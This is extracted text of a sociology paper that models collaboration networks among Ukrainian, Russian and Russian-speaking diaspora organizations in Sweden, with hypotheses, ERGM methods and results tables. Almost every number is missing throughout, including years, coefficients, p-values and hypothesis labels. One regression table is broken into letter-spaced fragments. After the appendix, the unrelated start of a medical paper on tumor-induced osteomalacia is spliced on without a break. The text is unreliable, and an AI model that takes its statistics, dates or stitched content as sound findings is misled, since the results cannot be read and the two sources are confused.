the main basis of identification in ethnic organizations is (obviously) ethnicity, and since almost every organization’s activities evolve around the cultural heritage of the group they represent, it makes little sense for them to be heterogeneous in terms of collaborations with other ethnic organizations. thus, unless two organizations share some similarities in their views on their “roots,” culture, or heritage, theoretically they should not have many reasons to collaborate. these similarities mostly relate to views on ethnicity and, in the case of russian, ukrainian, and russian-speaking organizations, showcase a complex and specific ethnic boundary- making process. one example is russian-speaking organizations, which can include people from almost every ex-soviet country. inclusion of different cultural and religious holidays in such organizations forms a pan- (often slavic)-ethnicity that connects all the specificities. in the case of ukrainian and russian organizations, the question of “similarity” of traditions and culture in general has been a loaded political topic, especially during the last several years when the war unraveled. the boundary between ukrainian and russian identifications has shifted continuously and is usually drawn on language spoken and/or country of origin. in the case of ethnic organizations, where each represents a group of people that are homogenous, at least in terms of how they self-identify through ethnicity (as someone representing a certain culture through membership in an organization), the focus of activity is usually traditions from the “homeland,” such as dancing or celebrating religious holidays, and relates to an already established sense of ethnic belonging (see discussion of homophily). however, when the war in the homeland starts abruptly, mobilization of the sense of ethnic belonging may lead to reinventing different activities and renegotiating collaborations on the basis of the attitude toward the ongoing war. ethnic organizations – due to their already strong connection to the idea of homeland (jabri, ; demmers, ; vertovec, ) – may regard taking a stand as a necessary point of activity in relation to their identification with certain ethnicity. however, if it is relatively easy to assign ethnicity to an organization through the already existing name, for example, the attitude toward the war could become a more complex process that is also related to maintaining the established ethnic identification. this may require more work, and organizations might feel the pressure to become active in support of or discontent with the ongoing situation at home. thus, the focus of their activities may shift, from primarily ethnicity-maintaining cultural events like celebrating shared perspectives on the history and traditions to relating primarily to the developments of the political situation currently ongoing at home. ukrainian and russian organizations in sweden and the conflict back home reorganizing the meanings of ethnicity  through the focus of activity studies of ethnicity and inter-ethnic relationships usually tend to understand ethnicity as a characteristic at the core identity (chow and bowman, ). i believe taking the model of focused social ties (feld, ) discussed above grants the possibility of studying ethnicity without these essentialist assumptions. it creates a theoretical possibility for understanding ethnicity and diasporic communities through action as constructed through maintenance of ethnic boundaries (wimmer, ). 
in the current study, i suggest that collaboration of ethnic organizations is often based on the perceptions of shared “routes” and heritage. however, in times of war in the homeland, a reorientation might take place, usually through activities such as demonstrations and different campaigns connected to the developments “back home.” in this way, the war in the homeland can become symbolically transported into the everyday of the diasporic organizations and thus become a focus of activity too. often, in order to raise an awareness about the developments in the homeland, the best way for these organizations would be to gather as many people as they can. hence, organize the similar others around them through activities related to the conflict that is happening thousands of miles away. at the same time, those who previously were non-political or even active at all might become mobilized to action as well. therefore, the restructuring of the organizational field by the conflict attitudes might take place. put in other words, if the war in the homeland has no implication for the collaboration networks, they would probably be characterized either by same ethnicity pairs, or not dominated by ethnic identifi- cation at all (only structural network characteristics would matter for the collaborations in this specific case, such as, e.g., large and famous organizations would be more likely to receive invitations to collabo- rate). on the other hand, if collaborations tend to be dominated by pairs that share a similar attitude to- ward the conflict, this could be a potential indicator that the war in the homeland has had a shaping role in the evolution of the collaboration networks. hypotheses in this section, i aim to clarify three main hypotheses that follow from the theoretical discussion above: h . there is some collaboration between ukrainian, russian, and russian-speakers’ organizations during the period studied. the collaborations are not dominated by organization pairs with the same ethnicity. this hypothesis suggests that there is some collaboration between ukrainian, russian, and russian-speakers’ organizations due to shared religion or traditions as well as, in some cases, a common spoken language. h . during the to period, ukrainian organizations tended to collaborate with other ukrainian organizations, and russian organizations with other russian organizations. organizations might have collaborated with each other along the homogenous narrative of a shared past and/ or language, similar ideas on common “roots,” etc., only within clear ethnic boundaries. this hypothesis refers to the possibility that during the revolution and subsequent war, this line of organizational collaboration remained the same. this scenario would showcase that while ethnicity is the main focus of the organizations, the developments in ukraine were not reflected in the processes of network clustering. h . organizations that share attitudes relating to the conflict tend to collaborate more with each other than with organizations with other attitudes during the period studied. in this scenario, organizational field of collaboration networks have reoriented from primarily subjectively identified ethnicity to standpoints on the armed conflict in eastern ukraine. thus, the third hypothesis suggests that the armed conflict in eastern ukraine can be regarded as a focus of activity for russian and ukrainian organizations in sweden (see fig. ). 
data collection the organizations researched in this study do not officially help with accommodation, work, or legal issues for the newly arrived migrants. the organizations that were created in the earliest period of critical developments in ukraine (late – ) were concerned with the protests, assessing them either positively and showing support or negatively and treating the revolution as a coup – in the latter case often connecting it to western political power struggles and conspiracies, connections or nationalist organizations active in ukraine. later, with the beginning of the armed conflict in eastern ukraine, a few organizations were created to send humanitarian help, among other activities, and some were created to spread information about the political developments in ukraine. organizational network data collection started in early . the network data were collected retrospectively through interviews and from official facebook pages and websites of different russian, russian-speaking, and ukrainian organizations. the main sampling method was to trace each organization from the connections of the previous one until the referrals led to the same organizations that were already in the database. the criteria for actors to appear in the network were: (i) the organization is russian, ukrainian, russian/ukrainian-speaking or active in connection with the conflict in eastern ukraine and (ii) the organization is based in sweden. actors could not be a political party or a governmental agency. some organizations based outside of sweden were included in the data collection but are not included in the data set for this analysis. the edges in the studied networks are all positive referrals and no negative (e.g. if organization a states that they will never collaborate with organization b, they have been excluded). since the referral tracing data collection method was employed, some specific issues about the network boundaries should be mentioned. the first criteria for appearing in the network included organizations that are somehow active in connection with the conflict in eastern ukraine. some of such organizations were generated by the conflict in eastern ukraine, while others have a broader set of activities and included in their agenda only a few events and collaborations that had to do with the conflict in eastern ukraine. in the first case, the conflict-generated organizations have been included as an edge sender and receiver node. in the latter case, the organization was coded only as an edge receiver. this was done to limit the network to only those organizations that are primarily focused on the conflict or identify themselves as russian, russian-speaking, or ukrainian, while including potential collaborations with organizations that have a broader set of activities and agenda overall. the main motivation for including those organizations only as edge receivers was also to account for the theoretical possibility that the antagonist organizations could be connected through these broader organizations. therefore, if not included at all, the network structure could be seriously implicated. the cumulative data for the period from to included edges between different organizations. however, for this analysis, the final data set consisted of organizations located in sweden (including international ones with a chapter in sweden) during the period to . table shows that there are ukrainian organizations and russian organizations that clearly identify as such. 
the category “mixed” includes organizations that have members that identify themselves as russian, ukrainian, or other countries that used to be part of the soviet union or are russian-speaking. some of these organizations also identify themselves as slavic. the fact that there are more specifically ukrainian organizations reflects the phenomenon described elsewhere (author’s other unpublished article), qualitatively, namely that the people who were not happy with the claims of neutrality of the pan-slavic organizations could demand a clear standpoint and even leave the organization if that demand was not satisfied. some of these people could also start their own organization. on the other hand, if an organization became more political during the war, some members might not have felt completely happy with such course of events, and leave the organization as well. furthermore, many organizations in the data set have been created as a direct response to the conflict, while claiming no identification with a specific ethnicity. it is important to also note here that since it has been possible to identify with a certain conflict side only after the conflict started, some of the already existing organizations had to choose whether they wanted to be neutral or not. six out of the eight pro- russian organizations have been created directly to acknowledge their attitudes toward the conflict. this is visible through the names of these organizations as well as their open declarations. out of all the figure : focus of the conflict for diasporic organizations in another country, a model. a h g no m l f i j k c e d b pro-side a pro-side b neutral space ukrainian and russian organizations in sweden and the conflict back home pro-ukrainian organizations, only two were created during and started by organizing demonstrations to raise awareness about political developments in ukraine during the month of the maidan revolution. the rest were pre-existing organizations that declared their support for the ukrainian revolution. an interesting case is portrayed by the fact that out of four explicitly russian organizations, only one claims to politically align with the pro-russian side in the conflict. however, out of the ukrainian organizations – are also pro-ukrainian. another interesting case is that of organizations that do not claim any ethnic identification (although in most cases these are predominantly russian-speaking) but have been created to support the pro-russian side of the conflict. taking these issues into account, and the fact that out of the organizations analyzed in the current research, eight organizations were created with an aim directly connected to the current ukrainian–russian conflict, it can be suggested that the collaboration networks have also been changing according to the developments in ukraine. to analyze the networks, i use exponential random graph models (ergms) as they provide a method for modeling the probability of tie formation simultaneously for both the node attributes, such as ethnicity or type of organization, and the structural network statistics, such as triadic relationships or reciprocity between the organizations. one of the most important features of the ergms is that they assume network self-organization, in other words, tie dependence on each other. 
in comparison to other methods used in social sciences that assume independence of the individual subjects of one another, ergms give a more intuitive conceptualization of social networks as based on interconnectedness of actors in them. ergms also allow a lot of freedom for the researcher, by allowing multiple parameters to account for in the model, both concerning summary network statistics but also actor attributes (lusher et al., ). in addition, ergms have often been used for the analysis of organizational collaboration networks (fischer and jasny, ). as for limitations, ergms require a complete network to perform well (lusher et al., ). to the best of the author’s knowledge, all ukrainian, russian, russian-speaking, or conflict-generated organizations active in sweden from to have been included in the data set. however, the issues of network boundaries and inclusion criteria, as discussed above, might potentially have some implications for the parameters’ estimation of the ergms. in addition, since ergms are relatively new, in terms of development of the software, and are computationally intensive, they often lack convergence. therefore, it is not always possible to compute every model, especially in the case of large networks (lusher et al., ). data variables and measures the attribute data for the nodes include information such as: type of organization (independent, umbrella, multinational), side taken by the organization in the conflict (pro-russian, pro-ukrainian, neutral/no explicit statement), and “ethnicity” of the organization (ukrainian, russian, mixed russians and ukrainians, other ethnicity, no connection to any ethnicity/ nationality). the two attributes of most interest for the current paper are organizational “ethnicity” and organizational choice of sides in the conflict. i treat table  . data frequencies. conflict side ethnicity neutral pro-russian pro-ukrainian total mixed (russian-speaking) not national other national organizations russian ukrainian total connections pro-russian, pro-ukrainian, or neutral as the three least complex attitudes toward the armed conflict in eastern ukraine that can be distinguished. by pro- russian attitude, i mean following the official position of the russian federation government on both the maidan revolution and the ongoing war. this means that organizations sharing this attitude believe that the maidan revolution was a coup, and that there has been a threat to the russian population in eastern ukraine, which justifies russian troops in the region, while also supporting the annexation of the crimean peninsula (osce russian delegation statement, ; address by the president of the russian federation from march , retrieved march ). by pro-ukrainian attitude, i mean following the official position of the ukrainian government that condemns the annexation of the crimean peninsula, does not believe there was a threat to the russian population in eastern ukraine after the maidan revolution, and sees the revolution as getting rid of the corrupt government serving under the v. yanukovych presidency (ukraine ministry of foreign affairs, ). by neutral attitude, i mean that either an organization explicitly stated its neutrality in the matters of the conflict or they never had any event, post, or statement about any of these events on their official web pages. model specifications ergms are not suitable for the data set because it only dates back to september, and thus has a very limited amount of both nodes and edges. 
however, that year was not yet marked by war or numerous deaths during the protests. the most active period, as discussed in the previous sections, was between the years and and which settled down by , at least in comparison to the previous years (uppsala conflict data program). therefore, the analysis here will only concern the period from to . all the models include the term “edges,” which serves as an intercept in the ergms and is a baseline probability of the tie formation (lusher et al., , p. ). all the models start with the same baseline model, which includes network statistics such as measures of reciprocity and (in) transitivity as well as geometrically weighted in- and out-degrees, which are more stable terms for controlling for degrees. they work by imposing a specific rate of decay by degree to control for the nodes with a higher degree to contribute less than those with lower degrees (capturing popularity and activity spread) (lusher et al., , p. ; morris et al., ). every model also includes the term “intransitive,” which controls for the effects of triplets of type d, , u, c, or c (as per davis and leinhardt’s, typology) and thus relates to clustering of the networks. this term is useful for the observed data since, as will become evident later in the descriptive analysis of the networks, most cases are characterized with low transitivity indices. in sum, together with reciprocity, the intransitivity term controls for effects of connectivity of the triplets. this specification helps for model convergence and fit since it “powers” the geometrically weighted terms. as for the node attributes that are covariates in the baseline models, these include type of organization, “ethnicity,” and the conflict side. since some of the organizations are umbrella organizations or relatively bigger in size and fame than others, this measure captures the size of the node and thus also its attractiveness and popularity to a certain degree. the second step adds a homophily term to test whether organizations that support a certain side of the conflict tend to form ties with other organizations that have exactly the same view on the conflict. unfortunately, only for the models was it also possible to check the tendency of pro-ukrainian organizations to specifically connect to other pro- ukrainian organizations, and pro-russian ones to other pro-russian ones (the model could converge with this particular specification of the term, while all the other models for the other networks lacked convergence). finally, the third step adds a homophily term on “ethnicity” of the organizations and tests whether organizations that identify with a certain ethnicity tend to form ties with organizations with the same identification. as will be shown with descriptive results, especially for ukrainian organizations, since there may be little heterogeneity on the standpoint toward the conflict and ethnicity, i performed multicollinearity checks for all the models that have both ethnic identification and conflict side parameters, by running them together and separately and comparing the results. if the results were different, then the full model included both “ethnicity” and “conflict side.” if they were not different, then the best fitted model is shown. to assess the fit of the models, i use the aic (the smaller the better) estimate and the goodness-of- fit plots of the models given by the “statnet:ergm” package in r software. the goodness of fit of the model is judged by the fit of degree distributions. 
i use p-values to assess the significance of the model parameters. many argue that the p-value has a ukrainian and russian organizations in sweden and the conflict back home meaning only in relation to what it could mean in the data and to the external context of the analysis, thus having a strict approach and regarding a parameter as significant only up to . level can be unnecessary and limiting. in addition, even though the ergm statnet package uses p-values, the ergms use monte carlo maximum likelihood estimation, for which taking confidence intervals as significance estimators makes more sense (lusher et al., ). therefore, i regard a parameter in the model as significant if the p-value has a value of up to . (at four levels). results descriptive and univariate  network analysis the period from to can be characterized by the growth of both the number of organizations and the amount of interorganizational connections for reasons discussed in the previous sections. the figure : network plots for the years of to (from left to right, row-wise). four networks are completely different in structure, size, and also the frequency of interactions or the number of edges (table and fig. ). moreover, new nodes appear in the network throughout the different years; hence, they should be analyzed separately (table ). there is little transitivity between the nodes during and . in , the transitivity index suggests that some sort of clustering was taking place. similarly, the network plots (fig. ) seem to further indicate some clustering along the ethnicity lines, especially for the years and . if we take a closer look at the network plots for all the years (fig. ), in all of which the size of the node is based on the node degree, the above network properties also seem to have a strong relation with the node attributes (in fig. , the nodal ethnicity attributes are shown in color). in addition to the descriptive properties discussed above, the plots hint on the clustering along ethnicity lines, which is stronger starting from year in the data set. connections figure : cross-tabulation correspondence map between categories “ethnicity” and “side of the conflict” in the data set. table  . descriptive network statistics. network size density edges (total) reciprocity transitivity . . . . . . . . . . figure shows further that most of the ukrainian organizations in the data set are on the pro-ukrainian side, while russian organizations take both pro-russian and neutral positions, and organizations that are mixed or do not self-identify with any ethnicity have a lot of heterogeneity. moreover, the absence of pro-ukrainian–russian organizations as well as pro-russian ukrainian organizations can also suggest that the conflict’s effect on the organizational network structure and that, at least for some organizations, the conflict in eastern ukraine, may have become a focus of activity, or possibly something that partially defines the organizational identity. however, it is impossible to say whether this clustering is statistically meaningful and whether it is due to the data collection, the structure of the network, the node attributes, or the intersection of all three without any statistical inference. the next section aims to test exactly this question. ergm results i start with the results from the model, which are presented below (table ; fig. a ). the best fit from all of the three steps performed in the model is shown by step two, which takes into account homophily based on the attitude towards conflict. 
interestingly, none of the covariates in the model are significant. the fact that neither the network structure nor nodal attributes of interest are significant, can pinpoint to the lag in creation of organizations that were specifically pro- russian as in comparison to those which were pro- ukrainian. in addition, since all the steps are showing very similar aic values, the geometrically weighted in-degree parameter’s significance and positive value ukrainian and russian organizations in sweden and the conflict back home table  . exponential random graph model for   network. baseline model step  step  covariates estimate se estimate se estimate se edges/intercept − . . − . . − . . reciprocity . . . . . . intransitive − . . − . . − . . gw out-degree − . . − . . − . . gw in-degree (fixed . ) . . . . . . . org. type umbrella organization − . . − . . − . . global independent organization – reference category . . . . . ethnic ident. ukrainian . . russian . . mixed (ukrainian and russian) – reference category . other – – no ethnic ident . . conflict side pro-russian pro-ukrainian neutral – reference category homophily on conflict side – . . on ethnic identification – . . aic . . notes: = ***; . = ** = . ; * = . ; . = . . in the baseline may give some information about the network. as discussed earlier, late to early saw many new organizations being created as a direct response to what was happening in ukraine. a lot of these organizations aimed to show support or opposition toward the revolution or, later, the developments in eastern ukraine. to be able to have a bigger impact, many of these organizations may have started to connect to other big organizations that were already established before and thus had more “power” in this particular field. this would contribute to the larger popularity (measured by geometrically weighted in-degree) of some actors in the network, showing that the network is centralized on in-degree. on the other hand, some organizations may have been very active in reaching out to many other organizations to make themselves known in this field. therefore, the analysis of the network suggests that there is some potential clustering in the network. however, since neither ethnicity nor attitude toward the conflict is significant as well as reflecting that there is no homophily in the collaboration network based on shared attitudes toward the conflict – h is supported. for the network (table ; fig. a ), step of the models shows the best fit. both network structure and node attributes matter for the log-odds of a tie between the organizations in . the large negative value on the intercept (term, edges) means that the network is sparse. the “intransitive” term is significant and negative, suggesting the tendency for decreasing number of intransitive triplets. interestingly, the reciprocity term is now positive and significant. these two terms taken together give indication toward the connections t a b le   .  e x p o n e n ti a l r a n d o m  g ra p h  m o d e l f o r   n e tw o rk . b a se lin e  m o d e l s te p   s te p   c o va ri a te s e st im a te s e e st im a te s e e st im a te s e e d g es /in te rc ep t − . ** * . − . ** * . − . ** * . re ci p ro ci ty . ** . . * . . ** . in tr an si tiv e − . . . − . . . − . . . g w in -d eg re e (fi xe d . ) . . . . . . g w o u t- d eg re e (fi xe d . ) − . ** * . − . ** * . − . ** * . o rg . ty p e u m b re lla o rg an iz at io n . . . . . . g lo b al in d ep en d en t o rg an iz at io n – r ef er en ce ca te g o ry . . . . . . 
et h n ic id en t. u kr ai n ia n r u ss ia n m ix ed (u kr ai n ia n a n d r u ss ia n ) – re fe re n ce c at eg o ry . . . . o th er n o e th n ic id en t. co n fli ct s id e p ro -r u ss ia n − . . p ro -u kr ai n ia n − . . n eu tr al – r ef er en ce c at eg o ry h o m o p h ily co n fli ct s id e p ro -r u ss ia n . . p ro -u kr ai n ia n . . . et h n ic id en t. m ix ed . . u kr ai n ia n . . a ic . . . n o te s: = ** *; . = ** = . ; * = . ; . = . . ukrainian and russian organizations in sweden and the conflict back home another significant covariate of the model is the conflict side, where the pro-russian side has a significant and positive value. this shows that organizations that are pro-russian tend to have higher log-odds of a tie with any other organization than those that do not take a clear side in the conflict. this may suggest that the significance of sharing a point of view with an organization that other organizations connect to does not have the same meaning anymore. one reason could be that in the year before, the definitions of the sides of support were already established and these organizations that share the same views have already connected; perhaps, it makes more sense to expand the connections, or not, to other organizations no matter what their view. thus, h is supported. discussion and conclusions the results show that the conflict in eastern ukraine may have become a focus of activity for many ukrainian and russian organizations active in sweden. the clustering of the organizations along the conflict attitude lines is shown to be significant, especially during the most violent period of the war ( ). the pro-ukrainian organizations seem to be more active and show a stronger tendency for homophily, especially in the network. the results also show that the side of the conflict that an organization takes might be a stronger driver to collaborating with other organizations, thus suggesting that the re-identification of the organization from only based on identification with a certain ethnicity to primarily conflict-oriented took place during the period studied. in other words, it is the attitude toward the conflict that might now define collaboration decisions, and not only the perception of similar “roots and routes.” in addition, early saw some pro-ukrainian organizations being created as a response to the maidan revolution and most ukrainians proclaiming their political orientation (mostly pro-revolution) toward it. on the other hand, in late and , a lot of pro- russian organizations (six) were created as a response to the openly acknowledged russian involvement, while the pre-existing russian organizations claimed mostly neutrality. by late , most of the organizations had a fixed political stance, including neutrality. these pro-russian organizations rarely claimed to be russian, and were mostly concerned with spreading the “truth” about the conflict in eastern ukraine. this has further driven and changed the field according to the conflict lines and pushed the organizations to collaborate only with those who share the same view on the conflict. more specifically, by difference in the network structure and show that reciprocal connections in were more likely. the in-degree term is not significant for the network in , as opposed to the out-degree. more precisely, it shows a relatively large negative value. 
the geometrically weighted out-degree term measures the activity spread; in cases where it is negative, it indicates that the majority of the actors in a network have similar levels of activity and thus, the network is not centralized on out-degree (lusher et al., ). this suggests that in , the organizations that were created in to in response to the conflict in eastern ukraine were already established within the structure at that point. what is most interesting about step in the network model is the significant (at . level) homophily value on the supported side of the conflict term for pro-ukrainian organizations, which suggests that pro-ukrainian organizations tend to have ties with similar (pro-ukrainian) organizations. while performing the sensitivity analysis, the fit of the model without controlling for ethnic identification was better. however, since the descriptive analysis showed that there is little variation for the ukrainian organizations in their attitudes toward the conflict, it can be assumed that this model does capture ethnicity. however, step of the model shows ethnic homophily as non-significant, and does not converge if the control for conflict side attitude is taken out. thus, it could arguably be understood that the attitude toward the conflict is a more steering parameter than ethnicity. therefore, h is supported by the results from the network. this was the only model that managed to converge with detailed ethnicity specifications. the model for the network (table ; fig. a ) shows the best fit in the baseline. unfortunately, due to technical issues related to the computations in the ergms, steps and in the models for the network did not converge and thus are not presented here. after performing a sensitivity check, and to avoid multicollinearity, the better fit model in the baseline was the one using conflict side as a control, and not ethnicity. again, the large negative value on the intercept means that the network is sparse, while geometrically-weighted in-degree being significant and positive indicates that larger organizations might be receiving more connections, and the non-significance of the negative “intransitive” term that controls for the intransitive triplets which all suggest that clustering within the network remains. the geometrically weighted out-degree term is still negative and indicates that most actors have a similar level of activity and that the network does not tend to be centralized on the out-degrees (lusher et al., ). connections , the pro-ukrainian organizations were more likely to collaborate with other organizations that identified as being pro-ukrainian. interestingly though, the pro- ukrainian organizations were less likely to have ties and thus engage in collaboration by , probably because all the pro-ukrainian organizations had already collaborated with each other by that point. in addition, after most of the pro-ukrainian organizations connected with each other, there were none left in the organizational field – and with no new organizations being created, by the pro-ukrainian organizations were less likely to collaborate with others in general. on the other hand, the pro-russian organizations tended to be more likely to collaborate with other organizations in , which is interesting since they were not significantly different from the neutral organizations in and . 
one explanation could be that many of the pro-russian organizations became most active and established in the organizational field in the late and , and therefore only in could they accumulate enough collaborations to be somewhat different from the neutral ones. to summarize, the fact that the attitude toward conflict explains tie formation within the collaboration networks for and better than ethnicity suggests that conflict in the homeland can become a focus of activity for organizations in a third country, and in this sense rearrange the organizational field. ethnic homophily probably present before, and based on already established relations and boundaries, loses its clustering potential when a new focus appears as an important factor for activism. this further suggests table  . exponential random graph model for   network  (steps   and   not converged). baseline model covariates estimate se edges/intercept − . * . reciprocity . ** . intransitive − . . gw in-degree . . . gw out-degree − . *** . org. type umbrella organization − . . independent organization – reference category . . global . . ethnic ident. ukrainian russian mixed (ukrainian and russian) – reference category other no ethnic id. conflict side pro-russian . * . pro-ukrainian − . . neutral – reference category . . homophily on conflict side on ethnic ident. aic . notes: = ***; . = ** = . ; * = . ; . = . . ukrainian and russian organizations in sweden and the conflict back home that ethnic boundary-making processes are contextual and evolving, not only in relation to the context of the country of residence but also with regard to the political developments in the home country. similar to féron ( ), i suggest that conflict may become de-territorialized from its geographical location using similar symbols and ideas; however, thereafter, it can become reshaped within the context of diasporic experiences and finally become autotomized from the original conflict. this can be the case with the russian and ukrainian organizations as they seem to have renegotiated collaboration practices from basing them on ethnic identification to verification of the attitude to the conflict of the other organizations. furthermore, these results may indicate that the meaning of ethnicity for the studied organizations, especially those identifying as ukrainian, has become intertwined with the perception of the conflict in eastern ukraine, and thus incorporating being pro-ukrainian in a political sense, with the meaning of being ukrainian within the multiple understandings of defining ethnicity. finally, although not generalizable, the results found in this study further suggest that armed conflicts can be “imported” or re-territorialized into other contexts and should be accounted for when studying ethnic groups, transnational communities, or diasporas whose “homeland” has been in an ongoing armed conflict. references address by president of the russian federation. available at: http://en.kremlin.ru/events/president/ news/ (accessed march , ). baser, b. . diasporas and homeland conflicts: a comparative perspective, ashgate publishing. blau, p. m. . inequality and heterogeneity: a primitive theory of social structure, macmillan company. brubaker, r. . the ‘diaspora’ diaspora. ethnic and racial studies ( ): – , available at: https://doi. org/ . / chow, r. and bowman, p. (eds) . the rey chow reader, columbia university press, new york, ny. coleman, j. . relational analysis: the study of social organizations with survey methods. 
human organization ( ): – , available at: https://doi.org/ . /humo. . .q m q n conflict in ukraine . socio-economic impacts of internal displacement and veteran return – summary report may (english) | the world bank. available at: http://documents. worldbank.org /curated /en/ / conflict-in-ukraine-socio-economic-impacts-of-internal- displacement-and-veteran-return-summar y-repor t- may- (accessed august , ). crash mh . july , available at: www. onder zoeksraad.nl/en/page/ /crash-mh - - july- (accessed january , ). davis, j. a. and leinhardt, s. . the structure of positive interpersonal relations in small groups, in berger, j. (ed.), sociological theories in progress, vol. , houghton-mifflin, boston, ma. demmers, j. . diaspora and conflict: locality, long-distance nationalism, and delocalisation of conflict dynamics. javnost – the public ( ): – , available at: https://doi.org/ . / . . eder, d. and hallinan, m. t. . sex differences in children’s friendships. american sociological review ( ): – , available at: https://doi.org/ . / embassy of the russian federation in the kingdom of sweden. available at: https://sweden.mid.ru/web/ sweden-en (accessed september , ). embassy of ukraine in the kingdom of sweden. available at: https://sweden.mfa.gov.ua/en (accessed september , ). european external action service website. available at: https://eeas.europa.eu/delegations/ukraine_en/ / eu launches eur million project to support ‘model police stations’ in ukrainian districts and new model of public order policing based on scandinavian approach. feld, s. l. . the focused organization of social ties. american journal of sociology ( ): – . féron, É. . transporting and re-inventing conflicts: conflict-generated diasporas and conflict autonomisation. cooperation and conflict ( ): – , available at: https://doi.org/ . / féron, É. and lefort, b. . diasporas and conflicts – understanding the nexus. diaspora studies ( ): – , available at: https://doi.org/ . / . . fischer, a. and jasny, l. . capacity to adapt to environmental change: evidence from a network of organizations concerned with increasing wildfire risk. ecology and society ( ), available at: https://doi. org/ . /es- - ibarra, h. . homophily and differential returns: sex differences in network structure and access in an advertising firm. administrative science quarterly ( ): – , available at: https://doi.org/ . / jabri, v. . introduction: understanding war and violence. in war and the transformation of global politics, palgrave macmillan, london, pp. – , available at: https://doi.org/ . / _ koinova, m. . sustained vs episodic mobilization among conflict-generated diasporas. international political science review ( ): – , available at: https://doi. org/ . / lagar för ideell förening – bolagsverket. available at: http://bolagsverket.se/fo/foreningsformer/ideell/ lagarideell- . (accessed august , ). lusher, d., koskinen, j. and robins, g. . ex- ponential random graph models for social networks: connections theory, methods, and applications, cambridge univer- sity press. mcpherson, j. m. and smith-lovin, l. . homophily in voluntary organizations: status distance and the composition of face-to-face groups. american sociological review ( ): – . mcpherson, m., smith-lovin, l. and cook, j. m. . birds of a feather: homophily in social networks. annual review of sociology ( ): – , available at: https://doi.org/ . /annurev.soc. . . marsden, p. v. . core discussion networks of americans. american sociological review ( ): – , available at: https://doi.org/ . 
/ marsden, p. v. . homogeneity in confiding relations. social networks ( ): – , available at: https://doi.org/ . / - ( ) -x migrationsverket. available at: www.migrationsverket. se (accessed december , ). ministry of foreign affairs of ukraine. briefings and video comments, available at: https://mfa.gov.ua/en/ press-center/briefing (accessed march , ). moliner, c. . frères ennemis? relations between panjabi sikhs and muslims in the diaspora. south asia multidisciplinary academic journal , available at: https://doi.org/ . /samaj. morris, m., handcock, m. s. and hunter, d. r. . specification of exponential-family random graph models: terms and computational aspects. journal of statistical software ( ): – . oberschall, a. . the manipulation of ethnicity: from ethnic cooperation to violence and war in yugoslavia. ethnic and racial studies ( ): – , available at: https://doi.org/ . / ooka, e. and wellman, b. . does social capital pay off more within or between ethnic groups? analysing job searches in five toronto ethnic groups, in fong, e. (ed.), inside the mosaic, university of toronto press, toronto, buffalo, london, pp. – , available at: www.jstor.org/ stable/ . / . portes, a., escobar, c. and arana, r. . bridging the gap: transnational and ethnic organizations in the political incorporation of immigrants in the united states. ethnic and racial studies ( ): – , available at: https://doi.org/ . / ragazzi, f. . diaspora: the politics of its meanings. international journal of political sociology ( ): – , available at: https://doi.org/ . /j. - . . _ .x riksbank. available at: www.riksbank.se/en-gb/ (accessed april , ). sida: ukraine. available at: www.sida.se/english/ where-we-work/europe/ukraine-/ (accessed december , ). smith, j. a., mcpherson, m. and smith-lovin, l. . social distance in the united states: sex, race, religion, age, and education homophily among confidants, to . american sociological review ( ): – . statement by the delegation of the russian federation on the situation in ukraine and the need to implement the minsk agreements|osce. available at: www.osce.org/ permanent-council/ (accessed august , ). statistikmyndigheten scb. available at: www.scb. se/ (accessed december , ). ucdp – uppsala conflict data program. available at: http://ucdp.uu.se/ (accessed january , ). un documents for ukraine. available at: www. securit ycouncilrepor t.org/un-documents/ukraine/ (accessed august , ). un office for the coordination of humanitarian aid (ocha) year in review. available at: http:// interactive.unocha.org /publication/ _year_ in _ review/ (accessed march , ). un security council meeting on seized ukrainian vessels. available at: www.un.org/press/en/ / sc .doc.htm (accessed march , ). vertovec, s. . conceiving and researching trans- nationalism. ethnic and racial studies ( ): – , available at: https://doi.org/ . / wimmer, a. . elementary strategies of ethnic boundary making. ethnic and racial studies ( ): – , available at: https://doi.org/ . / ukrainian and russian organizations in sweden and the conflict back home figure a : goodness-of-fit plot for the best fit model for network. : goodness-of-fit diagnostics minimum geodesic distance edge-wise shared partners indegree outdegree appendix. goodness-of-fit diagnostics i am presenting goodness-of-fit plots only for the best fit models per year. connections figure a : goodness-of-fit plot for the best fit model for network. 
:goodness-of-fit diagnostics minimum geodesic distance edge-wise shared partners in-degree out-degree ukrainian and russian organizations in sweden and the conflict back home figure a : goodness-of-fit plot for the best fit model for network. indegree outdegree : goodness-of-fit diagnostics minimum geodesic distance edge-wise shared partners : – r shah et al. case series of head neck tio and review research tumor induced osteomalacia in head and neck region: single center experience and systematic review ravikumar shah , anurag r lila , swati ramteke-jadhav , virendra patil , abhishek mahajan , sushil sonawane , puja thadani , anil dcruz , prathamesh pai , munita bal , subhada kane , nalini shah and tushar bandgar department of endocrinology, seth gs medical college & kem hospital, parel, mumbai, india department of radiodiagnosis and imaging, tata memorial hospital, mumbai, maharashtra, india department of head neck surgery, tata memorial hospital, mumbai, maharashtra, india department of pathology, tata memorial hospital, mumbai, maharashtra, india correspondence should be addressed to a r lila: anuraglila@gmail.com abstract tumor-induced osteomalacia in the head and neck region remains a challenging diagnosis to manage. literature pertaining to management and outcome details remains sparse. we describe two cohorts: cohort included seven patients from a single center in western india with tumors located in paranasal sinuses (n =  ), intracranial (n =  ) and maxilla (n =  ). the unique features from our series is the management of persistent disease with radiation therapy (n =  ) and peptide receptor radionuclide therapy (prrt) (n =  ). cohort two has patients identified from publications for systematic review. paranasal sinuses, mandible, intracranial disease, maxilla and oral cavity, in descending order, are reportedly common tumor sites. within this cohort, mean age was  ±  years at presentation with . % having local symptoms. duration of symptoms varied from to months. pre-surgery mean serum phosphorus was .  ±  .  mg/dl and median fgf- levels were . (iqr: . – . ) times of normal upper limit of normal. majority ( . %) were managed primarily with surgical excision; however, primary radiotherapy (n =  ) and surgery combined with radiotherapy (n =  ) were also reported. twenty patients had persistent disease while nine patients had recurrence, more commonly noted with intracranial and oral cavity tumors. surgery was the most common second mode of treatment employed succeeded by radiotherapy. four patients had metastatic disease. the most common histopathological diagnosis reported is pmt mixed connective tissue, while the newer terminology ‘pmt mixed epithelial and connective tissue type’ has been described in patients. introduction tumor-induced osteomalacia (tio), also known as oncogenic osteomalacia, is a rare paraneoplastic syndrome caused by overproduction of fibroblast growth factor (fgf ) by a tumor. fgf- plays a vital role in renal phosphate handling and vitamin d synthesis. hence, tio is characterized by hypophosphatemia due to renal phosphate wasting, inappropriately normal or low , dihydroxy vitamin d, and elevated or inappropriately normal plasma fgf- . these biochemical alterations eventually result in osteomalacia. due to its rarity, the diagnosis of tio is delayed with the average time from onset of 